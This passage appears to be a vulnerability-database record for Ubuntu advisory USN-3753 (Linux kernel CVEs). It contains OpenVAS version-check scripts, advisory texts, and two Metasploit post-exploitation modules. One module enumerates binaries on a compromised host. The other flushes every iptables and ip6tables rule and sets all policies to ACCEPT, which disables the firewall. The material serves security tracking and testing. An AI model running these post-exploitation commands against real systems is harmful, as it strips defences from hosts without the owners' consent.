[CVE-2018-10876](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-10876>)\n * [CVE-2018-10877](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-10877>)\n * [CVE-2018-10878](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-10878>)\n * [CVE-2018-10879](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-10879>)\n * [CVE-2018-10881](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10881>)\n * [CVE-2018-10882](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-10882>)\n * 
[CVE-2018-12233](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12233>)\n * [CVE-2018-13094](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13094>)\n * [CVE-2018-13405](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13405>)\n * [CVE-2018-13406](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13406>)\n", "modified": "2018-09-11T00:00:00", "published": "2018-09-11T00:00:00", "id": "CFOUNDRY:CD984900F2B581632FB9816EFFC5EA33", "href": "https://www.cloudfoundry.org/blog/usn-3753-2/", "title": "USN-3753-2: Linux kernel (Xenial HWE) vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:33:23", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2018-08-25T00:00:00", "id": "OPENVAS:1361412562310843627", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843627", "title": "Ubuntu Update for linux USN-3753-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3753_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux USN-3753-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843627\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-08-25 06:47:37 +0200 (Sat, 25 Aug 2018)\");\n script_cve_id(\"CVE-2017-13168\", \"CVE-2018-10876\", \"CVE-2018-10879\", \"CVE-2018-10877\", \"CVE-2018-10878\", \"CVE-2018-10882\", \"CVE-2018-10881\", \"CVE-2018-12233\", \"CVE-2018-13094\", \"CVE-2018-13405\", \"CVE-2018-13406\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3753-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that the generic SCSI driver in the Linux kernel did not\nproperly enforce permissions on kernel memory access. A local attacker\ncould use this to expose sensitive information or possibly elevate\nprivileges. (CVE-2017-13168)\n\nWen Xu discovered that a use-after-free vulnerability existed in the ext4\nfilesystem implementation in the Linux kernel. 
An attacker could use this\nto construct a malicious ext4 image that, when mounted, could cause a\ndenial of service (system crash) or possibly execute arbitrary code.\n(CVE-2018-10876, CVE-2018-10879)\n\nWen Xu discovered that a buffer overflow existed in the ext4 filesystem\nimplementation in the Linux kernel. An attacker could use this to construct\na malicious ext4 image that, when mounted, could cause a denial of service\n(system crash) or possibly execute arbitrary code. (CVE-2018-10877)\n\nWen Xu discovered that an out-of-bounds write vulnerability existed in the\next4 filesystem implementation in the Linux kernel. An attacker could use\nthis to construct a malicious ext4 image that, when mounted, could cause a\ndenial of service (system crash) or possibly execute arbitrary code.\n(CVE-2018-10878, CVE-2018-10882)\n\nWen Xu discovered that the ext4 filesystem implementation in the Linux\nkernel did not properly keep meta-data information consistent in some\nsituations. An attacker could use this to construct a malicious ext4 image\nthat, when mounted, could cause a denial of service (system crash).\n(CVE-2018-10881)\n\nShankara Pailoor discovered that the JFS filesystem implementation in the\nLinux kernel contained a buffer overflow when handling extended attributes.\nA local attacker could use this to cause a denial of service (system crash)\nor possibly execute arbitrary code. (CVE-2018-12233)\n\nWen Xu discovered that the XFS filesystem implementation in the Linux\nkernel did not properly handle an error condition with a corrupted xfs\nimage. An attacker could use this to construct a malicious xfs image that,\nwhen mounted, could cause a denial of service (system crash).\n(CVE-2018-13094)\n\nIt was discovered that the Linux kernel did not properly handle setgid file\ncreation when performed by a non-member of the group. A local attacker\ncould use this to gain elevated privileges. 
(CVE-2018-13405)\n\nSilvio Cesare discovered that the generic VESA frame buffer driver in the\nLinux kernel contained an integer overflow. A local attacker could use this\nto cause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2018-13406)\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"USN\", value:\"3753-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3753-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1032-kvm\", ver:\"4.4.0-1032.38\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1066-aws\", ver:\"4.4.0-1066.76\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1095-raspi2\", ver:\"4.4.0-1095.103\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1099-snapdragon\", ver:\"4.4.0-1099.104\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-134-generic\", ver:\"4.4.0-134.160\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n 
}\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-134-generic-lpae\", ver:\"4.4.0-134.160\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-134-lowlatency\", ver:\"4.4.0-134.160\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-134-powerpc-e500mc\", ver:\"4.4.0-134.160\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-134-powerpc-smp\", ver:\"4.4.0-134.160\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-134-powerpc64-emb\", ver:\"4.4.0-134.160\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-134-powerpc64-smp\", ver:\"4.4.0-134.160\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-aws\", ver:\"4.4.0.1066.68\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"4.4.0.134.140\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"4.4.0.134.140\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-kvm\", ver:\"4.4.0.1032.31\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"4.4.0.134.140\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc\", ver:\"4.4.0.134.140\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n 
{\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp\", ver:\"4.4.0.134.140\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb\", ver:\"4.4.0.134.140\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp\", ver:\"4.4.0.134.140\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-raspi2\", ver:\"4.4.0.1095.95\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-snapdragon\", ver:\"4.4.0.1099.91\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:20", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2018-08-25T00:00:00", "id": "OPENVAS:1361412562310843626", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843626", "title": "Ubuntu Update for linux-aws USN-3753-2", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3753_2.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux-aws USN-3753-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope 
that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843626\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-08-25 06:46:31 +0200 (Sat, 25 Aug 2018)\");\n script_cve_id(\"CVE-2017-13168\", \"CVE-2018-10876\", \"CVE-2018-10879\", \"CVE-2018-10877\", \"CVE-2018-10878\", \"CVE-2018-10882\", \"CVE-2018-10881\", \"CVE-2018-12233\", \"CVE-2018-13094\", \"CVE-2018-13405\", \"CVE-2018-13406\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-aws USN-3753-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-aws'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"USN-3753-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04\nLTS. This update provides the corresponding updates for the Linux\nHardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu\n14.04 LTS.\n\nIt was discovered that the generic SCSI driver in the Linux kernel did not\nproperly enforce permissions on kernel memory access. 
A local attacker\ncould use this to expose sensitive information or possibly elevate\nprivileges. (CVE-2017-13168)\n\nWen Xu discovered that a use-after-free vulnerability existed in the ext4\nfilesystem implementation in the Linux kernel. An attacker could use this\nto construct a malicious ext4 image that, when mounted, could cause a\ndenial of service (system crash) or possibly execute arbitrary code.\n(CVE-2018-10876, CVE-2018-10879)\n\nWen Xu discovered that a buffer overflow existed in the ext4 filesystem\nimplementation in the Linux kernel. An attacker could use this to construct\na malicious ext4 image that, when mounted, could cause a denial of service\n(system crash) or possibly execute arbitrary code. (CVE-2018-10877)\n\nWen Xu discovered that an out-of-bounds write vulnerability existed in the\next4 filesystem implementation in the Linux kernel. An attacker could use\nthis to construct a malicious ext4 image that, when mounted, could cause a\ndenial of service (system crash) or possibly execute arbitrary code.\n(CVE-2018-10878, CVE-2018-10882)\n\nWen Xu discovered that the ext4 filesystem implementation in the Linux\nkernel did not properly keep meta-data information consistent in some\nsituations. An attacker could use this to construct a malicious ext4 image\nthat, when mounted, could cause a denial of service (system crash).\n(CVE-2018-10881)\n\nShankara Pailoor discovered that the JFS filesystem implementation in the\nLinux kernel contained a buffer overflow when handling extended attributes.\nA local attacker could use this to cause a denial of service (system crash)\nor possibly execute arbitrary code. (CVE-2018-12233)\n\nWen Xu discovered that the XFS filesystem implementation in the Linux\nkernel did not properly handle an error condition with a corrupted xfs\nimage. 
An attacker could use this to construct a malicious xfs image that,\nwhen mounted, could cause a denial of service (system crash).\n(CVE-2018-13094)\n\nIt was discovered that the Linux kernel did not properly handle setgid file\ncreation when performed by a non-member of the group. A local attacker\ncould use this to gain elevated privileges. (CVE-2018-13405)\n\nSilvio Cesare discovered that the generic VESA frame buffer driver in the\nLinux kernel contained an integer overflow. A local attacker could use this\nto cause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2018-13406)\");\n script_tag(name:\"affected\", value:\"linux-aws on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"USN\", value:\"3753-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3753-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1028-aws\", ver:\"4.4.0-1028.31\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-134-generic\", ver:\"4.4.0-134.160~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-134-generic-lpae\", ver:\"4.4.0-134.160~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-134-lowlatency\", ver:\"4.4.0-134.160~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-134-powerpc-e500mc\", ver:\"4.4.0-134.160~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-134-powerpc-smp\", ver:\"4.4.0-134.160~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-134-powerpc64-emb\", ver:\"4.4.0-134.160~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-134-powerpc64-smp\", ver:\"4.4.0-134.160~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-aws\", ver:\"4.4.0.1028.28\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae-lts-xenial\", ver:\"4.4.0.134.114\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lts-xenial\", ver:\"4.4.0.134.114\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency-lts-xenial\", ver:\"4.4.0.134.114\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc-lts-xenial\", ver:\"4.4.0.134.114\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp-lts-xenial\", ver:\"4.4.0.134.114\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n 
exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb-lts-xenial\", ver:\"4.4.0.134.114\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp-lts-xenial\", ver:\"4.4.0.134.114\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2019-05-29T19:21:53", "bulletinFamily": "unix", "description": "USN-3753-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 LTS. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu 14.04 LTS.\n\nIt was discovered that the generic SCSI driver in the Linux kernel did not properly enforce permissions on kernel memory access. A local attacker could use this to expose sensitive information or possibly elevate privileges. (CVE-2017-13168)\n\nWen Xu discovered that a use-after-free vulnerability existed in the ext4 filesystem implementation in the Linux kernel. An attacker could use this to construct a malicious ext4 image that, when mounted, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-10876, CVE-2018-10879)\n\nWen Xu discovered that a buffer overflow existed in the ext4 filesystem implementation in the Linux kernel. An attacker could use this to construct a malicious ext4 image that, when mounted, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-10877)\n\nWen Xu discovered that an out-of-bounds write vulnerability existed in the ext4 filesystem implementation in the Linux kernel. An attacker could use this to construct a malicious ext4 image that, when mounted, could cause a denial of service (system crash) or possibly execute arbitrary code. 
(CVE-2018-10878, CVE-2018-10882)\n\nWen Xu discovered that the ext4 filesystem implementation in the Linux kernel did not properly keep meta-data information consistent in some situations. An attacker could use this to construct a malicious ext4 image that, when mounted, could cause a denial of service (system crash). (CVE-2018-10881)\n\nShankara Pailoor discovered that the JFS filesystem implementation in the Linux kernel contained a buffer overflow when handling extended attributes. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-12233)\n\nWen Xu discovered that the XFS filesystem implementation in the Linux kernel did not properly handle an error condition with a corrupted xfs image. An attacker could use this to construct a malicious xfs image that, when mounted, could cause a denial of service (system crash). (CVE-2018-13094)\n\nIt was discovered that the Linux kernel did not properly handle setgid file creation when performed by a non-member of the group. A local attacker could use this to gain elevated privileges. (CVE-2018-13405)\n\nSilvio Cesare discovered that the generic VESA frame buffer driver in the Linux kernel contained an integer overflow. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-13406)", "modified": "2018-08-24T00:00:00", "published": "2018-08-24T00:00:00", "id": "USN-3753-2", "href": "https://usn.ubuntu.com/3753-2/", "title": "Linux kernel (Xenial HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:22:02", "bulletinFamily": "unix", "description": "It was discovered that the generic SCSI driver in the Linux kernel did not properly enforce permissions on kernel memory access. A local attacker could use this to expose sensitive information or possibly elevate privileges. 
(CVE-2017-13168)\n\nWen Xu discovered that a use-after-free vulnerability existed in the ext4 filesystem implementation in the Linux kernel. An attacker could use this to construct a malicious ext4 image that, when mounted, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-10876, CVE-2018-10879)\n\nWen Xu discovered that a buffer overflow existed in the ext4 filesystem implementation in the Linux kernel. An attacker could use this to construct a malicious ext4 image that, when mounted, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-10877)\n\nWen Xu discovered that an out-of-bounds write vulnerability existed in the ext4 filesystem implementation in the Linux kernel. An attacker could use this to construct a malicious ext4 image that, when mounted, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-10878, CVE-2018-10882)\n\nWen Xu discovered that the ext4 filesystem implementation in the Linux kernel did not properly keep meta-data information consistent in some situations. An attacker could use this to construct a malicious ext4 image that, when mounted, could cause a denial of service (system crash). (CVE-2018-10881)\n\nShankara Pailoor discovered that the JFS filesystem implementation in the Linux kernel contained a buffer overflow when handling extended attributes. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-12233)\n\nWen Xu discovered that the XFS filesystem implementation in the Linux kernel did not properly handle an error condition with a corrupted xfs image. An attacker could use this to construct a malicious xfs image that, when mounted, could cause a denial of service (system crash). (CVE-2018-13094)\n\nIt was discovered that the Linux kernel did not properly handle setgid file creation when performed by a non-member of the group. 
A local attacker could use this to gain elevated privileges. (CVE-2018-13405)\n\nSilvio Cesare discovered that the generic VESA frame buffer driver in the Linux kernel contained an integer overflow. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-13406)", "modified": "2018-08-24T00:00:00", "published": "2018-08-24T00:00:00", "id": "USN-3753-1", "href": "https://usn.ubuntu.com/3753-1/", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2019-11-27T01:17:10", "bulletinFamily": "exploit", "description": "This module will be applied on a session connected to a shell. It will check which commands are available in the system.\n", "modified": "2019-01-24T17:22:19", "published": "2018-08-14T16:31:16", "id": "MSF:POST/LINUX/GATHER/ENUM_COMMANDS", "href": "", "type": "metasploit", "title": "Testing commands needed in a function", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::File\n include Msf::Post::Linux::System\n\n def initialize\n super(\n 'Name' => 'Testing commands needed in a function',\n 'Description' => %q{\n This module will be applied on a session connected to a shell. 
It will check which commands are available in the system.\n },\n 'Author' => 'Alberto Rafael Rodriguez Iglesias <albertocysec[at]gmail.com>',\n 'License' => MSF_LICENSE,\n 'Platform' => ['linux'],\n 'SessionTypes' => ['shell', 'meterpreter']\n )\n register_options(\n [\n OptString.new('DIR', [false, 'Optional directory name to list, default current session path',''])\n ])\n end\n\n DIRS = [\n \"/root/local/bin/\",\n \"/usr/local/sbin/\",\n \"/usr/local/bin/\",\n \"/usr/sbin/\",\n \"/usr/bin/\",\n \"/sbin/\",\n \"/bin/\",\n \"/usr/local/go/bin/\"\n ]\n\n def run\n dir = datastore['DIR']\n binaries = []\n\n # Explore the $PATH directories\n path_dirs = cmd_exec(\"echo $PATH\").split(':')\n path_dirs.each do |d|\n elems = dir(d)\n path = pwd()\n elems.each do |elem|\n binaries.insert(-1, \"#{d}/#{elem}\")\n end\n end\n\n # Explore common directories with binaries:\n DIRS.each do |d|\n# if dir_exist?(d)\n elems = dir(d)\n path = pwd()\n elems.each do |elem|\n binaries.insert(-1, \"#{d}#{elem}\")\n end\n end\n\n # Busybox commands\n if command_exists?(\"busybox\")\n output = cmd_exec(\"busybox\")\n busybox_cmds = output.split(':')[-1].chomp.split(',')\n busybox_cmds.each do |cmd|\n binaries.insert(-1, \"busybox #{cmd}\")\n print_good(\"busybox #{cmd}\")\n end\n elsif command_exists?(\"/bin/busybox\")\n output = cmd_exec(\"(bin/busybox\")\n end\n\n# A recursive ls through the whole system could be added to find extra binaries\n\n binaries.uniq\n binaries.sort\n\n print_good(\"The following binaries/commands are available\")\n binaries.each do |bin|\n print_line(\"#{bin}\")\n end\n\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/linux/gather/enum_commands.rb"}, {"lastseen": "2019-11-26T05:15:45", "bulletinFamily": "exploit", "description": "This module will be applied on a session connected to a shell. 
It will remove all IPTABLES rules.\n", "modified": "2019-01-24T17:22:19", "published": "2018-07-12T12:16:22", "id": "MSF:POST/LINUX/MANAGE/IPTABLES_REMOVAL", "href": "", "type": "metasploit", "title": "IPTABLES rules removal", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::File\n include Msf::Post::Linux::System\n\n def initialize\n super(\n 'Name' => 'IPTABLES rules removal',\n 'Description' => %q{\n This module will be applied on a session connected to a shell. It will remove all IPTABLES rules.\n },\n 'Author' => 'Alberto Rafael Rodriguez Iglesias <albertocysec[at]gmail.com>',\n 'License' => MSF_LICENSE,\n 'Platform' => ['linux'],\n 'SessionTypes' => ['shell', 'meterpreter']\n )\n end\n\n def run\n\n if command_exists?(\"iptables\")\n print_good(\"Deleting IPTABLES rules...\")\n cmd_exec(\"iptables -P INPUT ACCEPT\")\n cmd_exec(\"iptables -P FORWARD ACCEPT\")\n cmd_exec(\"iptables -P OUTPUT ACCEPT\")\n cmd_exec(\"iptables -t nat -F\")\n cmd_exec(\"iptables -t mangle -F\")\n cmd_exec(\"iptables -F\")\n cmd_exec(\"iptables -X\")\n print_good(\"iptables rules successfully executed\")\n else\n print_line(\"iptables rules could not be executed\")\n end\n if command_exists?(\"ip6tables\")\n print_good(\"Deleting IP6TABLES rules...\")\n cmd_exec(\"ip6tables -P INPUT ACCEPT\")\n cmd_exec(\"ip6tables -P FORWARD ACCEPT\")\n cmd_exec(\"ip6tables -P OUTPUT ACCEPT\")\n cmd_exec(\"ip6tables -t nat -F\")\n cmd_exec(\"ip6tables -t mangle -F\")\n cmd_exec(\"ip6tables -F\")\n cmd_exec(\"ip6tables -X\")\n print_good(\"ip6tables rules successfully executed\")\n else\n print_line(\"ip6tables rules could not be executed\")\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": 